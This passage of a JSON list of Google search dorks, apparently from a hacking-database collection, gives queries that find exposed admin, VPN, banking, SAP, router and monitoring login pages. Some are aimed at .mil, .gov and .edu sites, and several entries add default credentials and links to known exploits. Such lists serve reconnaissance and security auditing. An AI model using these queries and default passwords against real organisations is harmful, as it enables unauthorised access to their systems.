\r\n\r\n~CrimsonTorso"}, {"dork": "\"webkactus\"", "description": "Scrape websites using webkactus software login portals.\r\n\r\n~ CrimsonTorso"}, {"dork": "\"CCCLogin.aspx\"", "description": "Find direct login pages using ProPortal.\r\n\r\n~ CrimsonTorso"}, {"dork": "\"PaperCut Login\"", "description": "Find login portals for PaperCut printing software.\r\n\r\n~CrimsonTorso"}, {"dork": "\"Powered byPlanet eStream\"", "description": "Find websites using byPlanet eStream video software login portals.\r\n\r\n~ CrimsonTorso"}, {"dork": "inurl:login.jsp intitle:\"admin\"", "description": "Dork : inurl:login.jsp intitle:\"admin\"\r\n\r\nDescription : This Dork id Used to find the Admin Login Portal of a Web Page\r\nAuthor: Lino Thomas"}, {"dork": "intitle:\"manager area\" password -stackoverflow.com", "description": "Login portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "\"Copyright Metislab\" password", "description": "Metislab login portals\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "nd=m_fundraising_detail \"login here\"", "description": "Some fund raising related login portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:\"/jira/login.jsp\" intitle:\"JIRA login\"", "description": "inurl:\"/jira/login.jsp\" intitle:\"JIRA login\"\r\n\r\nJira login pages\r\n\r\nManhNho"}, {"dork": "inurl:secure/dashboard jspa", "description": "Access to JIRA dashboards login portals and sometimes direct access to\r\nprojects dashboard itself.\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:\"Thank you for using BIG-IP.\"", "description": "BIG-IP F5 devices footprinting, it gives you login portals and errorcodes\r\nfor F5\r\n\r\nAlso try:\r\ninurl:my.logout.php3?\r\ninurl:\"/my.policy\" big-ip\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:/usersignin?", "description": "Login portals\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"phpVirtualBox - VirtualBox Web Console\"", "description": "# Exploit Title: Find phpVirtualBox login portail\r\n\r\n# Google Dork: intitle:\"phpVirtualBox - VirtualBox Web Console\"\r\n\r\n# Date: 10/09/2018\r\n\r\n# Exploit Author: Hamoji\r\n\r\n# Vendor Homepage: https://github.com/phpvirtualbox/phpvirtualbox\r\n\r\n# Version: 4.3-3, 5.0-5"}, {"dork": "inurl:/banking.jsp?fldsegment=", "description": "[*] Description: Finds The Internet Banking Portals Which Are Running on\r\nOracle Flex-cube Core Banking Solutions.\r\n\r\n[*] Google Dork: inurl:/banking.jsp?fldsegment=\r\n\r\n[*] Author: Osman Arif"}, {"dork": "inurl:/INALogin.jsp", "description": "[*] Description: Finds The Internet Banking Backend Administrator Portals\r\nRunning on Oracle Flex-cube Core Banking Solutions.\r\n\r\n[*] Google Dork: inurl:/INALogin.jsp\r\n\r\n[*] Author: Osman Arif"}, {"dork": "intitle:Login inurl:login.php intext:admin/admin", "description": "intitle:Login inurl:login.php intext:admin/admin\r\n\r\n\r\nThis Google Dork discovers login portals with weak default passwords.\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "intitle:login \"recruiter\" | \"employer\" | \"candidate\"", "description": "Recruitment and employers login portals.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:\"authentication\" intranet password login inurl:account ext:(doc | pdf | xls| psw | ppt | pps | xml | txt | ps | rtf | odt | sxw | xlsx | docx | mail)", "description": "A mix of login portals and passwords\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:login intext:\"reset your password\"", "description": "Information on how login portals reset their users/customers passwords and\r\nso on.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schm"}, {"dork": "intext:(username | user | email | sign on | login | auth) admin dashboard | panel -stackoverflow", "description": "A lot of login portals.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:login.do? | shoplogin.do | adminlogin", "description": "More login portals...\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:\"Default+Administrator+View\"", "description": "Some login portals, somtimes obsolete Verizon Java based applications\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inur:\"arsys/forms\" | \"arsys/shared\" | \"/arsys/home\"", "description": "BMC remedy AR System Server portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "\"ProQuest provides subscription access to numerous premium technical journals, dissertations and other information databases.\"", "description": "Find login portals on websites using ProQuest.\r\n\r\n~ CrimsonTorso"}, {"dork": "intitle:\"Log in - WhatsUp Gold\"", "description": "Description: This google dork can expose the landing log in page for\r\nWhatsUp Gold network monitoring tool.\r\nHere's the published CVE link for WhatsUp Gold:\r\nhttps://www.cvedetails.com/vulnerability-list/vendor_id-193/product_id-3865/Ipswitch-Whatsup-Gold.html\r\n\r\nAuthor: Zulfikar Azhari"}, {"dork": "intitle:\"OAuth Server Login\"", "description": "intitle:\"OAuth Server Login\"\r\n\r\nLogin page\r\n\r\nManhNho"}, {"dork": "inurl:\"/saml2?SAMLRequest=\"", "description": "Login portals using SAML\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n\r\n@brulliant"}, {"dork": "inurl:\"/phpsqlitecms/cms/index.php\"", "description": "phpsqlitecms login panel\r\n\r\nManhNho"}, {"dork": "\"vpnssl\"", "description": "I found the following dork by typing \"vpnssl\" on Google. It contains logins\r\nportals containing vpnssl companies access."}, {"dork": "inurl:/config/authentication_page.htm", "description": "Cisco Switch Configuration Utility\r\nManhNho"}, {"dork": "intext:\"Type in Username and Password, then click Ok\" intitle:\"log in\"", "description": "Web login panel\r\n\r\nManhNho"}, {"dork": "\"inurl:\"Umbraco/#/login\" site:*edu\"", "description": "Find login portals for .edu websites using Umbraco web software.\r\n\r\n\r\nFind login portals for .gov websites using Umbraco web software.\r\n\"inurl:\"Umbraco/#/login\" site:*gov\"\r\n\r\n~ CrimsonTorso"}, {"dork": "\"login\":", "description": "\"login\":\r\n\r\nThis Google Dork discovers thousands of login portals.\r\n\r\n\r\n\r\n- Gionathan \"John\" Reale"}, {"dork": "inurl:_cpanel/forgotpwd", "description": "inurl:_cpanel/forgotpwd\r\n\r\ndiscover cpanel login portals for Neto eCommerce suite users.\r\n\r\n~ B15mu7h"}, {"dork": "inurl:webman/index.cgi", "description": "inurl:webman/index.cgi\r\n\r\nNAS DiskStation Login portals\r\n\r\n~ B15mu7h"}, {"dork": "\"Example: jane.citizen1\"", "description": "\"Example: jane.citizen1\"\r\n\r\nLogin portals\r\n\r\n~ B15mu7h"}, {"dork": "intext:\"EQ1PCI\"", "description": "Finds Login portals\r\n\r\n~ Kaligulah"}, {"dork": "inurl:admin.php inurl:admin ext:php", "description": "Admin Login Page !!(inurl:admin.php inurl:admin ext:php)\r\n\r\nDork by T3jv1l"}, {"dork": "inurl:/sap/bc/bsp", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ SAP NetWeaver ABAP ++\r\n\r\ninurl:/sap/bc/bsp\r\n\r\n\u2043\tFinds SAP login portals\r\n\u2043\tFinds SAP server entry points\r\n\u2043\tFinds SAP servers of large companies\r\n\u2043\t18 Vulnerabilities on Exploit DB available for SAP NetWeaver at the time of writing:\r\n\u2043 https://www.exploit-db.com/exploits/44647 \r\n\u2043 https://www.exploit-db.com/exploits/44292 \r\n\u2043 https://www.exploit-db.com/exploits/40816 \r\n\u2043\t\u2026\u2026. just search SAP NetWeaver and the desired Version\r\n\u2043\t66.100 results at the time of writing\r\n\r\nDISCLAIMER:\r\nThe vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system\r\nSome of these are sourced from Onapsis, ERPscan and Rapid7 all have great sources on SAP testing"}, {"dork": "inurl:/irj/portal", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ SAP NetWeaver Login Portals ++\r\n\r\ninurl:/irj/portal\r\n- Finds SAP NetWeaver login portals\r\n- Finds SAP Enterprise login portals\r\n- Finds SAP NetWeaver server entry points\r\n- Finds SAP NetWeaver servers of large companies\r\n- 18 Vulnerabillites on Exploit DB available for SAP NetWeaver at the time of writing:\r\n - https://www.exploit-db.com/exploits/44647\r\n - https://www.exploit-db.com/exploits/44292\r\n - https://www.exploit-db.com/exploits/40816\r\n - \u2026\u2026. just search SAP NetWeaver and the desired Version\r\n- 10.600 results at the time of writing\r\n\r\nDISCLAIMER:\r\n(The vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system)\r\nSome of these are sourced from Onapsis, ERPscan and Rapid7 all have great sources on SAP testing"}, {"dork": "inurl:infoviewapp", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ SAP InfoView Business Objects ++\r\n\r\ninurl:infoviewapp\r\n- Potential access to sensitive information\r\n- Login portals\r\n- Server entry points\r\n- Server\r\n- Potential to manipulate business objects\r\n- 2 Cross-Site Scripting Vulnerabillites available:\r\n - https://www.exploit-db.com/exploits/36936\r\n - https://www.exploit-db.com/exploits/36935\r\n- 3.680 results at the time of writing\r\n\r\nDISCLAIMER:\r\n(The vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system)\r\nSome of these are sourced from Onapsis, ERPscan and Rapid7 all have great sources on SAP testing"}, {"dork": "filetype:cwr inurl:apstoken", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ SAP crystal reports business enterprise login ++\r\n\r\nfiletype:cwr inurl:apstoken\r\n- Login portals for crystal reports\r\n- Enterprise reports\r\n- Error messages\r\n- Possible Cross-Site Scripting\r\n - https://www.exploit-db.com/exploits/32882\r\n- Possible Directory Traversal\r\n - https://www.exploit-db.com/exploits/16054\r\n- 7 results at the time of writing\r\n\r\nDISCLAIMER:\r\n(The vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system)\r\nCredit goes to the boys of Rapid7"}, {"dork": "inurl:/login.zul", "description": "Login panel\r\n\r\nManhNho"}, {"dork": "inurl:/pwm/public/", "description": "# Exploit Title: PWM Password Manager Directory.\r\n# Google Dork: inurl:/pwm/public/\r\n# Description: Find PWM directories with login portals and/or user registration/activation forms.\r\n# Date: 08/01/2019.\r\n# Exploit Author: Sohaib E.B.\r\n# Category: Pages Containing Login Portals"}, {"dork": "inurl:/FxCodeShell.jsp/ \"Login Form\" \"Blog Comments\"", "description": "Category : Pages containing login portals\r\n\r\nDescription : Dork for finding login portals of fxcodeshell.jsp\r\n\r\nDork : inurl:/FxCodeShell.jsp/ \"Login Form\" \"Blog Comments\"\r\n\r\nAlso try : inurl:/FxCodeShell.jsp::$DATA/\r\n\r\nDate : 10/2/2019\r\n\r\nAuthor : Manish Bhandarkar"}, {"dork": "inurl:\"/my-account-login\" | allintext:\"My Account\"", "description": "Category : Pages containing login portals\r\n\r\nDescription : Dork for finding login portals where well known company\r\nwebsites hosted on famous hosting provider such as Akamai, Amazon,\r\nMicrosoft Azure, Leaseweb, weebly, Rackspace, OVH SAS, etc.\r\n\r\nDork : inurl:\"/my-account-login\" | allintext:\"My Account\"\r\n\r\nAlso try : inurl:\"/my-account/login\"\r\n\r\nDate : 10/2/2019\r\n\r\nAuthor : Manish Bhandarkar\r\nBlog : https://hackingforsecurity.blogspot.com/"}, {"dork": "intitle:vendor | supply & login | portal intext:login | email & password", "description": "Login portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:pin | userid & password intitle:supplier | supply & login | portal", "description": "Login portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:/za/login.do", "description": "Zscaler admin login\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:/adfs/services/trust", "description": "ADFS instance logins\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:rms webportal", "description": "Login portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:F5Networks-SSO-Req?", "description": "BIG-IP corporate logins\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:shared/login.jsp?/ BMC arsys", "description": "More BMC remedy portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:login.htm \"xpress\" password", "description": "Xpress login portals, powered by Ilantus\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:login.htm \"access\" database", "description": "Several database logins\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:SSOLogin.jsp intext:\"user\"", "description": "Dork : inurl:SSOLogin.jsp intext:\"user\"\r\n\r\nDescription : this dork gives you user single sign on (SSO) jsp login portals.\r\n\r\nAuthor : botsec0"}, {"dork": "/adp/self/service/login", "description": "Category : Pages containing login portals\r\n\r\n\r\nDescription : Dork for finding to login portals of Employees and admins\r\nwhich using Automatic Data Processing Inc., commonly known as ADP, is an\r\nAmerican provider of human resources management software and services.\r\nUntil 2014, ADP was one of four American companies in the S&P 500 to have a\r\nAAA credit rating from Standard & Poor's and Moody's.\r\n\r\n\r\nEnjoy :)\r\n\r\n\r\n\r\nDork : /adp/self/service/login\r\n\r\n\r\n\r\nDate : 04/3/2019\r\n\r\n\r\nAuthor : Manish Bhandarkar\r\n\r\nBlog : https://hackingforsecurity.blogspot.com/"}, {"dork": "inurl:'/scopia/entry/index.jsp'", "description": "Search: Avaya Scopia Login Page\r\n\r\n*Google Dorks:* inurl:'/scopia/entry/index.jsp'\r\n*Default Credentials: *admin/admin\r\n\r\nAuthor: Rishabh Sharma (Lazy Hacker)"}, {"dork": "inurl:'/logon/logonServlet'", "description": "*Search: * SAP NetWeaver Application Server Java Login\r\n\r\n*Google Dorks: *inurl:'/logon/logonServlet'\r\n*Default Credentials:* TMSADM: $1Pawd2&\r\n\r\n*Author:* Rishabh Sharma (Lazy Hacker)"}, {"dork": "inurl:'/zabbix/index.php'", "description": "*Search: *Zabbix Login page (Network Monitoring Tool)\r\n*Google Dorks: *inurl:'/zabbix/index.php'\r\n*Default Credentials:* Admin:zabbix (Sometimes without login accessible)\r\n\r\n*Author:* Rishabh Sharma (Lazy Hacker)"}, {"dork": "intitle:'Centreon - IT & Network Monitoring'", "description": "*Search: * Centreon - IT & Network Monitoring Login\r\n*Google Dorks: *intitle:'Centreon - IT & Network Monitoring'\r\n*Default Credentials:* admin/centreon\r\n\r\n*Author:* Rishabh Sharma (Lazy Hacker)"}, {"dork": "\"online learning powered by bksb\"", "description": "Find school & college login portals for BKSB.\r\n~ CrimsonTorso"}, {"dork": "intitle:\"iDRAC-login\"", "description": "Search: Integrated Dell Remote Access Controller - Enterprise\r\nGoogle Dorks: intitle:\"iDRAC-login\"\r\nCategory : Various Online Devices\r\n\r\nExploit Author:- Harsh Mukeshbhai Joshi"}, {"dork": "intitle:\"Log In - Juniper Web Device Manager\"", "description": "Search: Log In - Juniper Web Device Manager\r\nGoogle Dorks: intitle:\"Log In - Juniper Web Device Manager\"\r\nCategory : Various Online Devices\r\n\r\nExploit Author:- Harsh Mukeshbhai Joshi"}, {"dork": "intitle:.:: Welcome to the Web-Based Configurator::.", "description": "Search: zyxel Router Login Page\r\nGoogle Dorks: intitle:.:: Welcome to the Web-Based Configurator::.\r\nCategory : Various Online Devices\r\n\r\nExploit Author:- Harsh Mukeshbhai Joshi"}, {"dork": "site:com inurl:b2blogin ext:cfm | jsp | php | aspx", "description": "Dork : site:com inurl:b2blogin ext:cfm | jsp | php | aspx\r\n\r\nDescription : this dork gives you all type of b2b login portals.\r\n\r\nAuthor : botsec0"}, {"dork": "inurl:7474/browser intitle:Neo4j", "description": "Login pages of Neo4j graph database. Some pages can even access the\r\ndatabase.\r\n\r\nAuthor : Raj Kiran P"}, {"dork": "intitle:OmniDB intext:\"user. pwd. Sign in.\"", "description": "Login page of OmniDB database.\r\n\r\nAuthor : Raj Kiran P"}, {"dork": "inurl:ctl/Login/Default.aspx", "description": "The Dork: inurl:ctl/Login/Default.aspx reveals the CMS Login page for the Dot Net Nuke CMS.\r\n\r\nVersions DNN 7.1.0 and earlier / DNN 6.2.8 and earlier are vulnerable to XXS ( CVE-2013-4649 ). \r\n\r\nThis can be tested by reviewing the page source code and searching for default.css where the version will precede it."}, {"dork": "intitle:\"qBittorrent Web UI\" inurl:8080", "description": "intitle:\"qBittorrent Web UI\" inurl:8080\r\n\r\ndefault: admin // adminadmin"}, {"dork": "site:mil ext:cfm inurl:login.cfm", "description": "Dork : site:mil ext:cfm inurl:login.cfm\r\n\r\nDescription : this dork will give you coldfusion login portals of mil websites.\r\n\r\nAuthor : botsec0"}, {"dork": "inurl:+CSCOE+/logon.html", "description": "# Google Dork: inurl:+CSCOE+/logon.html\r\n# Description: Google Dork to find Cisco Asa webvpn login pages\r\n# Date: 2019-05-06\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "inurl:login.aspx filetype:aspx intext:\"TMW Systems\"", "description": "Transportation Analytics Login Portals.\r\n\r\nDecoy"}, {"dork": "inurl:\"/Shop/auth/login\"", "description": "Category : Pages containing login portals\r\n\r\nDescription : Dork for finding login portals\r\n\r\nDork : inurl:\"/Shop/auth/login\"\r\n\r\nDate : 11/5/2019\r\n\r\nAuthor : Manish Bhandarkar\r\nBlog : https://hackingforsecurity.blogspot.com/"}, {"dork": "inurl:office365 AND intitle:\"Sign In | Login | Portal\"", "description": "Dork:\r\ninurl:office365 AND intitle:\"Sign In | Login | Portal\"\r\n\r\nDescription:\r\nOffice 365 Login Portals"}, {"dork": "intext:\"Login | Password\" AND intext:\"Powered by | username\" AND intext:Drupal AND inurl:user", "description": "Dork:\r\nintext:\"Login | Password\" AND intext:\"Powered by | username\" AND\r\nintext:Drupal AND inurl:user\r\n\r\nDescription:\r\nDrupal login portals"}, {"dork": "intitle:\"oracle bi publisher enterprise login\"", "description": "Google dork description: Sites running Oracle Business Intelligence\r\n\r\nGoogle Search: intitle:\"oracle bi publisher enterprise login\"\r\n\r\nSubmitted by: Alfie\r\n\r\nWebsite: (https://the-infosec.com)"}, {"dork": "inurl:/login.rsp", "description": "Find online DRV/XVR login page.\r\nDork : inurl:/login.rsp\r\nAuthor : Islam Uddin (H4wK) https://h4wk-0x00.blogspot.com/"}, {"dork": "intitle:\"admin console\" inurl:login site:\"*.edu\"|site:\"*.gov\"|site:\"*.net\" -site:*.com -help -guide -documentation -release -notes -configure -support -price -cant", "description": "I have discovered a google dork that reveals a number of admin\r\nconsole pages for websites ending in edu / gov or net.\r\n\r\n*Google Dork*\r\n\r\nintitle:\"admin console\" inurl:login site:\"*.edu\"|site:\"*.gov\"|site:\"*.net\"\r\n-site:*.com -help -guide -documentation -release -notes -configure -support\r\n-price -cant\r\n\r\n*Dates: *21-05-2019\r\n\r\n*Dork Author:* acc3ssp0int"}, {"dork": "\"please sign in\" \"sign in\" \"gophish\" +\"login\"", "description": "Description: Find login portal pages for Gophish script\r\n setups. Default login creds are admin:gophish.\r\nCategory: Pages Containing Login Portals\r\n\r\nAuthor: edm0nd https://twitter.com/edmond_major"}, {"dork": "intitle:\"iLO Login\" intext:\"Integrated Lights-Out 3\"", "description": "intitle:\"iLO Login\" intext:\"Integrated Lights-Out 3\"\r\n\r\nDescrption: Find HP / HPE ilo 3 pages exposed to the Internet and\r\ndiscovered by Google.\r\n\r\nAuthor:\r\nFabio Stoll (Fastor)"}, {"dork": "\"Web Analytics powered by Open Web Analytics - v: 1.6.2\"", "description": "Find login portals for websites using Open Web Analytics.\r\n\r\nBy GnosticPlayers"}, {"dork": "intitle:\"Outlook Web Access\" | \"Outlook Web app\" -office.com -youtube.com -microsoft.com", "description": "Outlook Web Access (OWA) login portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n@brulliant"}, {"dork": "intext:\"Sign in with your organizational account\" login -github.com", "description": "Office365 login pages.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n@brulliant"}, {"dork": "inurl:\"CookieAuth.dll?GetLogon?\" intext:log on", "description": "Some Microsoft & Netscaler login portals.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n@brulliant"}, {"dork": "-youtube.com login | password | username intitle:\"assessment\"", "description": "Login portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n@brulliant"}, {"dork": "inurl:9000 AND intext:\"Continuous Code Quality\"", "description": "Category: Pages containing login portals\r\nDescription: Dork for publicly available SonarQube dashboard pages\r\nDork: inurl:9000 & intext:\"Continuous Code Quality\"\r\nDate: 05/06/2019\r\nAuthor: Goktug Serez"}, {"dork": "inurl:\"/fuel/login\"", "description": "Fuel CMS Login Panels"}, {"dork": "intitle:\"netscaler gateway\" intext:password \"please log on\"", "description": "Netscaler web app log in portals.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n@brulliant"}, {"dork": "inurl:\"/vpn/tmindex.html\" vpn", "description": "Netscaler & Citrix Gateway VPN login portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:\"evetsites\" \"Login\"", "description": "Login portals for all sites hosted by popular veterinary hosting platform eVetSites\r\n\r\nZerconil"}, {"dork": "inurl:/admin/index.php?module=config", "description": "Finding the Mybb admin login page:\r\ninurl:/admin/index.php?module=config\r\n\r\nReza Abasi"}, {"dork": "inurl:/admin/index.php", "description": "Finding the admin login page:\r\n\r\ninurl:/admin/index.php\r\ninurl:/admin/index.php intitle:\"Login\"\r\n\r\nReza Abasi"}, {"dork": "inurl:/en-US/account/login?return_to=", "description": "# Google Search: inurl:/en-US/account/login?return_to=\r\n# Google Dork Description: [Servers that running Splunk Enterprise (SIEM)]\r\n# Date: [12-July-2019]\r\n# Exploit Author: [Zayed AlJaberi]\r\n# Vendor Homepage: [https://www.splunk.com/]"}, {"dork": "intext:Grafana New version available! -grafana.com -grafana.org inurl:/login", "description": "# Exploit Title: Grafana login\r\n\r\n# Google Dork: intext:Grafana New Version available! -grafana.com\r\n-grafana.org inurl:/login\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:simple/view/login.html", "description": "# Exploit Title: Huawei Lan Switch Login\r\n\r\n# Google Dork: inurl:simple/view/login.html\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:Dashboard.jspa intext:\"Atlassian Jira Project Management Software\"", "description": "Page Containing Login Portals\r\nTargeted platform: Jira Project and Issue Tracking Software\r\nDork: inurl:Dashboard.jspa intext:\"Atlassian Jira Project Management Software\""}, {"dork": "site:*/login/login.php", "description": "Finding login page of php\r\nsite:*/login/login.php\r\n\r\nReza Abasi"}, {"dork": "inurl:/admin/login.php", "description": "Finding login page of php sites\r\ninurl:/admin/login.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:wp/wp-login.php", "description": "Finding login page of wordpress\r\n\r\ninurl:wp/wp-login.php\r\nsite:*/wp-login.php intitle:\"Log In\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/site/login.php", "description": "# Exploit Title: Login PAge\r\n\r\n# Google Dork: inurl:/site/login.php\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:/client/login.php", "description": "# Exploit Title: Client Login\r\n\r\n# Google Dork: inurl:/client/login.php\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:/guest/login.php", "description": "# Exploit Title: Guest Login\r\n\r\n# Google Dork: inurl:/guest/login.php\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:/administrator/login.php", "description": "# Exploit Title: Administrator Login\r\n\r\n# Google Dork: inurl:/administrator/login.php\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:/system/login.php", "description": "# Exploit Title: System Login\r\n\r\n# Google Dork: inurl:/system/login.php\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:/student/login.php", "description": "# Exploit Title: Student login\r\n\r\n# Google Dork: inurl:/student/login.php\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:/teacher/login.php", "description": "# Exploit Title: Teacher login page\r\n\r\n# Google Dork: inurl:/teacher/login.php\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:/employee/login.php", "description": "# Exploit Title: Employee Login Page\r\n\r\n# Google Dork: inurl:/employee/login.php\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:/index.aspx/login", "description": "inurl:/index.aspx/login\r\ninurl:\"/index.aspx?login=\" intitle:\"Login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:amazonaws.com inurl:login.php", "description": "Finding login page of php sites\r\nsite:amazonaws.com inurl:login.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:cgi/login.pl", "description": "Dorks: \r\n\r\ninurl:cgi/login.pl\r\ninurl:cgi/login.pl intext:\"Matrix Science\"\r\n\r\n-M. Cory Billington"}, {"dork": "site:*/auth intitle:login", "description": "Finding login page of sites\r\nsite:*/auth intitle:login\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl: admin/login.aspx", "description": "Google Dork: inurl: admin/login.aspx\r\nDate: 08/02/2019\r\nAuthor: Adrian Roy Lorica"}, {"dork": "inurl:/login/index.jsp -site:hertz.*", "description": "Finding login page of sites\r\ninurl:/login/index.jsp -site:hertz.*\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:login.cgi", "description": "pages containing login portal\r\n\r\ninurl:login.cgi\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/joomla/administrator", "description": "Joomla admin login portal\r\n\r\nsite:*/joomla/administrator\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:accounts.*.com/signin/", "description": "login portal\r\n\r\nsite:accounts.*.com/signin/\r\nsite:account.*.com/signin/\r\nsite:accounts.*.*/signin/\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/index.jsp intitle:\"login\"", "description": "login portal\r\n\r\nsite:*/index.jsp intitle:\"login\"\r\nsite:\"/index.jsp\" intitle:\"Login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/login/auth", "description": "login portal\r\n\r\nsite:*/login/auth\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:adminpanel/index.php", "description": "GOOLGE DORK\r\nDork: inurl:adminpanel/index.php\r\nAuthor: Sathishshan\r\nInfo: Contains sensitive directory information of adminpanel login"}, {"dork": "site:portal.*.com/signin/", "description": "# Exploit Title: Sign-in Portal Subdomain\r\n\r\n# Google Dork: site:portal.*.com/signin/\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "site:admin.*.com/signin/", "description": "# Exploit Title: Signin of Admin Subdomain\r\n\r\n# Google Dork: site:admin.*.com/signin/\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "site:login.*.com/signin/", "description": "# Exploit Title: Sign-in for Subdomain Site\r\n\r\n# Google Dork: site:login.*.com/signin/\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "site:conf.*.com/signin/", "description": "# Exploit Title: Sign-in for Conference Subdomain site\r\n\r\n# Google Dork: site:conf.*.com/signin/\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "site:social.*.com/signin/", "description": "# Exploit Title: Sign-in Social Website Subdomain\r\n\r\n# Google Dork: site:social.*.com/signin/\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "inurl:login_user.asp", "description": "login portal\r\n\r\ninurl:login_user.asp\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:sign in inurl:/signin", "description": "login portal\r\n\r\nintitle:sign in inurl:/signin\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"sign in\" inurl:login.aspx", "description": "login portal\r\n\r\nintitle:\"sign in\" inurl:login.aspx\r\n\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/user/login", "description": "login portal\r\n\r\nsite:*/user/login\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/account/login", "description": "login portal\r\n\r\nsite:*/account/login\r\ninurl:/account/login\r\nsite:login.*.*/account/login\r\nsite:*/account/auth/\r\nsite:*/account/recovery/\r\nsite:*/account/recover/\r\nsite:*/account/forget-pass/\r\nsite:*/account/forget/\r\nsite:*/account/userlogin/\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/forum/ucp.php?mode=login", "description": "login portal phpBB\r\n\r\nsite:*/forum/ucp.php?mode=login\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:memberlist.php?mode=viewprofile", "description": "login portal phpBB\r\n\r\ninurl:memberlist.php?mode=viewprofile\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/sign-in", "description": "login portal\r\n\r\nsite:*/sign-in\r\nsite:*/user/sign-in/\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"EdgeOS\" intext:\"Please login\"", "description": "Dork: intitle:\"EdgeOS\" intext:\"Please 